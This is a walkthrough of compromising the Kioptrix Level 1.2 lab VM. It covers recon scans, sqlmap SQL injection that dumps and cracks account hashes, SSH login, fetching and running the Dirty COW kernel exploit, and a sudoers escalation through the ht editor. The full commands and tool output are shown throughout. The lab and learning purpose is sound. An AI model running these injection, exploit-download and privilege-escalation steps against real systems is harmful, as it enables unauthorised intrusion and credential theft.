Kioptrix: Level 1.2 (#3) – Walkthrougth

Last night, I was solved most of the web challenge from the ctfs.me. I can’t sleep no more but ranking 3. I will write all of the challenges that i already solve may be later. Tonight i try to test next third box of Kioptrix series. Let’s get start.

Target ip is 192.168.1.73

┌─[[email protected]]─[~]
└──> nmap 192.168.1.* -sn -n

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 20:37 +0630
Nmap scan report for 192.168.1.1
Host is up (0.00038s latency).
MAC Address: 60:E3:27:BE:75:78 (Tp-link Technologies)
Nmap scan report for 192.168.1.73
Host is up (0.00049s latency).
MAC Address: 00:0C:29:ED:78:4A (VMware)
Nmap scan report for 192.168.1.74
Host is up (0.0045s latency).
MAC Address: CC:AF:78:12:3B:9F (Hon Hai Precision Ind.)
Nmap scan report for 192.168.1.100
Host is up (0.00016s latency).
MAC Address: 34:97:F6:C3:0B:66 (Asustek Computer)
Nmap scan report for 192.168.1.101
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.25 seconds

Scan again with Nmap version scan.

┌─[[email protected]]─[~]
└──> nmap -sV 192.168.1.73

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 20:40 +0630
Nmap scan report for kioptrix3.com (192.168.1.73)
Host is up (0.00026s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:ED:78:4A (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.29 seconds

So simple, just only ssh and http open. Scan the dir again with dirbuster.

┌─[[email protected]]─[~]
└──> dirb http://192.168.1.73 -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Jan  7 20:41:09 2018
URL_BASE: http://192.168.1.73/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.73/ ----
==> DIRECTORY: http://192.168.1.73/cache/                                                                    
==> DIRECTORY: http://192.168.1.73/core/                                                                     
+ http://192.168.1.73/data (CODE:403|SIZE:323)                                                               
+ http://192.168.1.73/favicon.ico (CODE:200|SIZE:23126)                                                      
==> DIRECTORY: http://192.168.1.73/gallery/                                                                  
+ http://192.168.1.73/index.php (CODE:200|SIZE:1819)                                                         
==> DIRECTORY: http://192.168.1.73/modules/                                                                  
==> DIRECTORY: http://192.168.1.73/phpmyadmin/                                                               
+ http://192.168.1.73/server-status (CODE:403|SIZE:332)                                                      
==> DIRECTORY: http://192.168.1.73/style/                                                                    
                                                                                                             
-----------------
END_TIME: Sun Jan  7 20:41:17 2018
DOWNLOADED: 4612 - FOUND: 4

Try to open port 80 first and check vulnerable or not. Search the parameter to exploit and then i found sql injection error message when i enter the single quote.

http://kioptrix3.com/gallery/gallery.php?id=1

Now open sqlmap, dump all data from tables but i try first os shell upload test . it fail because i don’t know the web server path.

┌─[[email protected]]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --is-dba --os-shell
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:46:03

[20:46:04] [INFO] resuming back-end DBMS 'mysql' 
[20:46:04] [INFO] testing connection to the target URL
[20:46:04] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:46:04] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:46:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:46:04] [INFO] testing if current user is DBA
[20:46:04] [INFO] fetching current user
current user is DBA:    True
[20:46:04] [INFO] going to use a web backdoor for command prompt
[20:46:04] [INFO] fingerprinting the back-end DBMS operating system
[20:46:04] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[20:46:10] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[20:46:12] [INFO] retrieved web server absolute paths: '/gallery/gallery~.php'
[20:46:12] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[20:46:12] [WARNING] unable to upload the file stager on '/var/www/'
[20:46:12] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[20:46:12] [WARNING] expect junk characters inside the file as a leftover from UNION query
[20:46:12] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:12] [INFO] trying to upload the file stager on '/var/www/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:12] [WARNING] unable to upload the file stager on '/var/www/gallery/gallery.php/'
[20:46:12] [INFO] trying to upload the file stager on '/var/www/gallery/gallery.php/' via UNION method
[20:46:12] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:12] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[20:46:12] [WARNING] unable to upload the file stager on '/var/www/html/'
[20:46:12] [INFO] trying to upload the file stager on '/var/www/html/' via UNION method
[20:46:12] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:12] [INFO] trying to upload the file stager on '/var/www/html/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:13] [WARNING] unable to upload the file stager on '/var/www/html/gallery/gallery.php/'
[20:46:13] [INFO] trying to upload the file stager on '/var/www/html/gallery/gallery.php/' via UNION method
[20:46:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[20:46:13] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'
[20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via UNION method
[20:46:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:13] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/gallery/gallery.php/'
[20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/gallery/gallery.php/' via UNION method
[20:46:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:13] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method
[20:46:13] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'
[20:46:13] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via UNION method
[20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:14] [INFO] trying to upload the file stager on '/var/www/nginx-default/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:14] [WARNING] unable to upload the file stager on '/var/www/nginx-default/gallery/gallery.php/'
[20:46:14] [INFO] trying to upload the file stager on '/var/www/nginx-default/gallery/gallery.php/' via UNION method
[20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:14] [INFO] trying to upload the file stager on '/srv/www/' via LIMIT 'LINES TERMINATED BY' method
[20:46:14] [WARNING] unable to upload the file stager on '/srv/www/'
[20:46:14] [INFO] trying to upload the file stager on '/srv/www/' via UNION method
[20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:14] [INFO] trying to upload the file stager on '/srv/www/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:14] [WARNING] unable to upload the file stager on '/srv/www/gallery/gallery.php/'
[20:46:14] [INFO] trying to upload the file stager on '/srv/www/gallery/gallery.php/' via UNION method
[20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:14] [INFO] trying to upload the file stager on '/gallery/' via LIMIT 'LINES TERMINATED BY' method
[20:46:14] [WARNING] unable to upload the file stager on '/gallery/'
[20:46:14] [INFO] trying to upload the file stager on '/gallery/' via UNION method
[20:46:15] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:15] [INFO] trying to upload the file stager on '/gallery/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:15] [WARNING] unable to upload the file stager on '/gallery/gallery/gallery.php/'
[20:46:15] [INFO] trying to upload the file stager on '/gallery/gallery/gallery.php/' via UNION method
[20:46:15] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:15] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 97 times, 500 (Internal Server Error) - 1 times
[20:46:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:46:15

Find database name with sqlmap.

┌─[[email protected]]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --current-db
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:47:35

[20:47:35] [INFO] resuming back-end DBMS 'mysql' 
[20:47:35] [INFO] testing connection to the target URL
[20:47:35] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:47:35] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:47:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:47:35] [INFO] fetching current database
current database:    'gallery'
[20:47:35] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[20:47:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:47:35

Database name is gallery, And then try to select table from this database.

┌─[[email protected]]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --tables -D gallery
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:48:37

[20:48:38] [INFO] resuming back-end DBMS 'mysql' 
[20:48:38] [INFO] testing connection to the target URL
[20:48:38] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:48:38] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:48:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:48:38] [INFO] fetching tables for database: 'gallery'
[20:48:38] [INFO] the SQL query used returns 7 entries
[20:48:38] [INFO] resumed: dev_accounts
[20:48:38] [INFO] resumed: gallarific_comments
[20:48:38] [INFO] resumed: gallarific_galleries
[20:48:38] [INFO] resumed: gallarific_photos
[20:48:38] [INFO] resumed: gallarific_settings
[20:48:38] [INFO] resumed: gallarific_stats
[20:48:38] [INFO] resumed: gallarific_users
Database: gallery                                                                                                                      
[7 tables]
+----------------------+
| dev_accounts         |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |
+----------------------+

[20:48:38] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[20:48:38] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:48:38

dev_accounts tables is main table to get the login info. Select columns again from this table.

┌─[[email protected]]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --columns -T dev_accounts -D gallery
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:49:48

[20:49:49] [INFO] resuming back-end DBMS 'mysql' 
[20:49:49] [INFO] testing connection to the target URL
[20:49:49] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:49:49] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:49:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:49:49] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[20:49:49] [INFO] the SQL query used returns 3 entries
[20:49:49] [INFO] resumed: "id","int(10)"
[20:49:49] [INFO] resumed: "username","varchar(50)"
[20:49:49] [INFO] resumed: "password","varchar(50)"
Database: gallery                                                                                                                      
Table: dev_accounts
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(10)     |
| password | varchar(50) |
| username | varchar(50) |
+----------+-------------+

[20:49:49] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[20:49:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:49:49

Finally,I dump data of username and password from dev_accounts table.

┌─[[email protected]]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dump -C username,password -T dev_accounts -D gallery
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:50:52

[20:50:52] [INFO] resuming back-end DBMS 'mysql' 
[20:50:52] [INFO] testing connection to the target URL
[20:50:52] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:50:52] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:50:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:50:52] [INFO] fetching entries of column(s) 'password, username' for table 'dev_accounts' in database 'gallery'
[20:50:52] [INFO] the SQL query used returns 2 entries
[20:50:52] [INFO] retrieved: "0d3eccfb887aabd50f243b3f155c0f85","dreg"
[20:50:52] [INFO] retrieved: "5badcaf789d3d1d09794d8f021f40f0e","loneferret"
[20:50:52] [INFO] recognized possible password hashes in column 'password'                                                             
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: gallery
Table: dev_accounts
[2 entries]
+------------+----------------------------------+
| username   | password                         |
+------------+----------------------------------+
| dreg       | 0d3eccfb887aabd50f243b3f155c0f85 |
| loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+------------+----------------------------------+

[20:50:58] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[20:50:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[20:50:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:50:58

Password is md5 hash,I decrypt the hash at the hashkiller.co.uk. It really nice site. After decrypt the hash i got the following password

0d3eccfb887aabd50f243b3f155c0f85 MD5 : Mast3r
5badcaf789d3d1d09794d8f021f40f0e MD5 : starwars

Final username and password is dreg:Mast3r and loneferret:starwars.  I already notice ssh was open at the start of entry point of the box. Let’s try to login ssh with this info.

┌─[[email protected]]─[~]
└──> ssh [email protected]
[email protected]'s password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sun Jan  7 15:56:07 2018 from 192.168.1.101
[email protected]:~$ ls -al; uname -a; cat /etc/passwd
total 24
drwxr-xr-x 2 dreg dreg 4096 2018-01-07 15:56 .
drwxr-xr-x 5 root root 4096 2011-04-16 07:54 ..
-rw------- 1 dreg dreg  245 2018-01-07 15:56 .bash_history
-rw-r--r-- 1 dreg dreg  220 2011-04-16 07:54 .bash_logout
-rw-r--r-- 1 dreg dreg 2940 2011-04-16 07:54 .bashrc
-rw-r--r-- 1 dreg dreg  586 2011-04-16 07:54 .profile
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

Login success of first username and found 2 user in the system. Kernel version is 2.6 but it old kernel. i not sure to get the root but let’s try.

Search at the google and found dirty cow exploit to root this kernel.

https://www.exploit-db.com/exploits/40839
[email protected]:~$ wget --no-check-certificate https://www.exploit-db.com/raw/40839 -O dirty.c
--16:01:56--  https://www.exploit-db.com/raw/40839
           => `dirty.c'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 5,006 (4.9K) [text/plain]

100%[============================================================================================>] 5,006         --.--K/s             

16:01:57 (303.35 MB/s) - `dirty.c' saved [5006/5006]

[email protected]:~$ gcc -pthread dirty.c -o dirty -lcrypt
dirty.c:193:2: warning: no newline at end of file
[email protected]:~$ ./dirty 133720
-rbash: ./dirty: restricted: cannot specify `/' in command names

When i complie the gcc it not allow, Let’s me change another user again.

[email protected]:~$ su loneferret
Password: 
[email protected]:/home/dreg$ ls -al
total 44
drwxr-xr-x 2 dreg dreg  4096 2018-01-07 16:02 .
drwxr-xr-x 5 root root  4096 2011-04-16 07:54 ..
-rw------- 1 dreg dreg   245 2018-01-07 15:56 .bash_history
-rw-r--r-- 1 dreg dreg   220 2011-04-16 07:54 .bash_logout
-rw-r--r-- 1 dreg dreg  2940 2011-04-16 07:54 .bashrc
-rwxr-xr-x 1 dreg dreg 10939 2018-01-07 16:02 dirty
-rw-r--r-- 1 dreg dreg  5006 2018-01-07 16:01 dirty.c
-rw-r--r-- 1 dreg dreg   586 2011-04-16 07:54 .profile
[email protected]:/home/dreg$ ./dirty 133720
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 133720
Complete line:
firefart:fiptwK6toyYJg:0:0:pwned:/root:/bin/bash

mmap: b7fe0000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '133720'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '133720'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
[email protected]:/home/dreg$ su firefart
Password: 
[email protected]:/home//dreg# 
[email protected]:/home/dreg# id
uid=0(firefart) gid=0(root) groups=0(root)
[email protected]:/home/dreg# mv /tmp/passwd.bak /etc/passwd
[email protected]:/home/dreg# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/home/dreg#

Yo! Dirty Cow can root!… 😉 , Read the flag  /root/Congrats.txt

[email protected]:~# cat Congrats.txt 
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone. 
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: 
http://www.lotuscms.org

Gallery application: 
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

[email protected]:~# 

Bango! We done the third box again! but there have another method to get root. I check at the sudoer file and user loneferret can run ht editor as root.

loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht

let’s try another way

[email protected]:/# su loneferret           
[email protected]:/$ clear
'xterm-256color': unknown terminal type.
[email protected]:/$ export TERM=xterm
[email protected]:/$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
[email protected]:/$ sudo /usr/local/bin/ht 
[email protected]:/$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
    (root) NOPASSWD: /bin/bash
[email protected]:/$ sudo /bin/bash
[email protected]:/# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/# whoami
root
[email protected]:/# 

Wooot.. AGain! Thanks for reading .. Happy Hacking..